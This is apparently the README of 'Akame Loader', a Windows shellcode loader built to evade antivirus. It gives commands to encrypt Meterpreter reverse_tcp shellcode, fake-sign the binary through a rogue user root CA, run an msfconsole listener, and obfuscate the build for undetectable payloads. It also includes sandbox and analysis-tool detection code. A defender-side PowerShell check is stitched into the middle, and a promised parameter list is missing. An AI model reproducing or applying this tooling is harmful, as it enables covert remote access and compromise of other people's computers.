Icon: https://icon-icons.com/icon/Halloween-eye/109170

| Name | Details |
|---|---|
| Name | Akame Loader |
| Author | N3agu |
| Language | C++ |
| Platform | Windows |
| Version | 1.1 |
| License | MIT |
| Libraries | kernel32, advapi32, crypt32 |
| Encryption | AES256 |
| Build | Release |
! If you change the encryption method and want to keep your executable UD for a longer period of time, don't use VirusTotal / AntiScan.me / any other site that distributes to security vendors.
1. Generate shellcode
2. Encrypt your shellcode with encrypt.exe

```
mv shellcode.bin "\Akame Loader\x64\Release\Resources\"
cd "\Akame Loader\x64\Release\Resources\"
encrypt --help    (optional, to view the manual)
encrypt.exe -l cpp -m file -i shellcode.bin -e random -o cli
```

3. Copy the output and paste it under the "payload" comment
4. Change the resources
5. Build the project
6. Add a certificate to your executable

! Change "Akame.exe" to your executable and AkameCert/AkameCA to whatever you want

```
move Akame.exe Resources && cd Resources
makecert.exe -r -pe -n "CN=Akame CA" -ss CA -sr CurrentUser -a sha256 -cy authority -sky signature -sv AkameCA.pvk AkameCA.cer
certutil -user -addstore Root AkameCA.cer
makecert.exe -pe -n "CN=Akame Cert" -a sha256 -cy end -sky signature -ic AkameCA.cer -iv AkameCA.pvk -sv AkameCert.pvk AkameCert.cer
pvk2pfx.exe -pvk AkameCert.pvk -spc AkameCert.cer -pfx AkameCert.pfx
signtool.exe sign /v /f AkameCert.pfx /t http://timestamp.digicert.com/?alg=sha1 Akame.exe
```

7. Listen for incoming connections

```
msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST *IP*    (optional)
set LPORT *PORT*
exploit
```
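The signing step above only works because `certutil -user -addstore Root` plants a self-signed CA in the current user's Root store, so the binary validates on that one machine. The following check is an added defender-side example (not part of the Akame Loader repository); it takes a file path as its only assumption and reports whether the file's Authenticode chain ends in a root that is trusted only per-user, plus any other self-signed user-only roots present on the box.

```powershell
# Added example, not Akame Loader code. Point -Path at any signed executable.
param([string]$Path = ".\Akame.exe")   # default path is an assumption

# Roots the whole machine trusts; anything outside this set was added per-user.
$machineRoots = (Get-ChildItem Cert:\LocalMachine\Root).Thumbprint

$sig = Get-AuthenticodeSignature -FilePath $Path
if (-not $sig.SignerCertificate) {
    Write-Output "$Path is not signed (Status: $($sig.Status))"
    return
}

# Build the chain the same way the OS does and inspect its top element.
$chain = New-Object System.Security.Cryptography.X509Certificates.X509Chain
$null = $chain.Build($sig.SignerCertificate)
$root = $chain.ChainElements[$chain.ChainElements.Count - 1].Certificate

[pscustomobject]@{
    File         = $Path
    Status       = $sig.Status                     # Valid, NotSigned, UnknownError, ...
    Signer       = $sig.SignerCertificate.Subject
    Root         = $root.Subject
    SelfSigned   = ($root.Subject -eq $root.Issuer)
    UserOnlyRoot = ($machineRoots -notcontains $root.Thumbprint)  # true for the makecert/certutil flow
}

# Independently list self-signed roots that exist only in the user's store.
Get-ChildItem Cert:\CurrentUser\Root |
    Where-Object { $_.Subject -eq $_.Issuer -and $machineRoots -notcontains $_.Thumbprint } |
    Select-Object Subject, Thumbprint, NotBefore, NotAfter
```

A `Status` of `Valid` together with `UserOnlyRoot = True` is the signature a per-user rogue CA leaves behind; on a clean machine the second listing is normally empty.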
Platform: Windows 10 x64
Antivirus: Windows Defender 24/10/2022

! 720p because I can't upload video files bigger than 10MB on github
! Blackscreens in the video caused by UAC

I uploaded the loader to Virus Total because I don't want this to be used for malicious purposes!
The shellcode used was generated with metasploit (payload: windows/x64/meterpreter/reverse_tcp) and encrypted by \resources\encrypt.exe.
The loader was built with VS22 and signed with a sha1 certificate.

Link: https://www.virustotal.com/gui/file/68e6a25457093584a043ed3f721be9bc9b6456edd792cb4e30054e85bdc4119f

! Attention, the reason the loader gets a lot of detections now is because Virus Total distributes samples, this is completely normal. With simple code obfuscation / small changes you can obtain a new, FUD payload, don't be script kiddies / pasters, learn how to code, stay safe!
With the "C++ Clang Compiler for Windows" and "MSBuild support for LLVM (clang-cl) toolset" Visual Studio components installed, go to

```
C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\Llvm\x64\bin
```

and copy the files that you downloaded from Github and overwrite! The provided code is a set of parameters used with LLVM's obfuscation passes; here's a list of each parameter and what it does (parameters taken directly from the ollvm-17 repository).
After that you only need to compile your solution; you will get a fairly large executable, but with control-flow flattening, string encryption and instruction substitution applied. Here's what you should get when analyzing the control flow graph with IDA:
Create a mutex to avoid running multiple instances of Akame on the same machine. POC:

```cpp
// Check the mutex at the beginning
if (OpenMutex(MUTEX_ALL_ACCESS, 0, L"MUTEX_RANDOM_STRING"))
    return 0;
// Create mutex
CreateMutex(0, 0, L"MUTEX_RANDOM_STRING");
```
More anti-analysis techniques (functions that check for suspicious files, directories, processes, window names, etc.). POC:

```cpp
#include <windows.h>
#include <tlhelp32.h>
#include <strsafe.h>

// A simple hard-disk check is already done, but we can as well check the available RAM / CPU
// If the machine has less than 2048mb (2gb) of ram -> exit
MEMORYSTATUSEX memoryStatus;
memoryStatus.dwLength = sizeof(memoryStatus);
GlobalMemoryStatusEx(&memoryStatus);
DWORD RAMMB = (DWORD)(memoryStatus.ullTotalPhys / 1024 / 1024);
if (RAMMB < 2048) return 0;

// If the machine has less than 2 logical processors -> exit
SYSTEM_INFO systemInfo;
GetSystemInfo(&systemInfo);
DWORD numberOfProcessors = systemInfo.dwNumberOfProcessors;
if (numberOfProcessors < 2) return 0;

// Check for specific running processes that are usually used in malware analysis, like WireShark, PE-Bear, ProcMon, IDA, X64/X32 DBG, etc.
PROCESSENTRY32W processEntry = { 0 };
processEntry.dwSize = sizeof(PROCESSENTRY32W);
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
WCHAR processName[MAX_PATH + 1];
if (Process32FirstW(hSnapshot, &processEntry))
{
    do
    {
        StringCchCopyW(processName, MAX_PATH, processEntry.szExeFile);
        CharUpperW(processName);   // compare case-insensitively
        if (wcsstr(processName, L"WIRESHARK.EXE") || wcsstr(processName, L"PE-BEAR.EXE") || ...)
        {
            CloseHandle(hSnapshot);
            return 0;
        }
    } while (Process32NextW(hSnapshot, &processEntry));
}
CloseHandle(hSnapshot);
```
VirusTotal screenshots (not reproduced here): File, Hashes, Table of Imports
MIT License
Copyright (c) 2024 N3agu
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.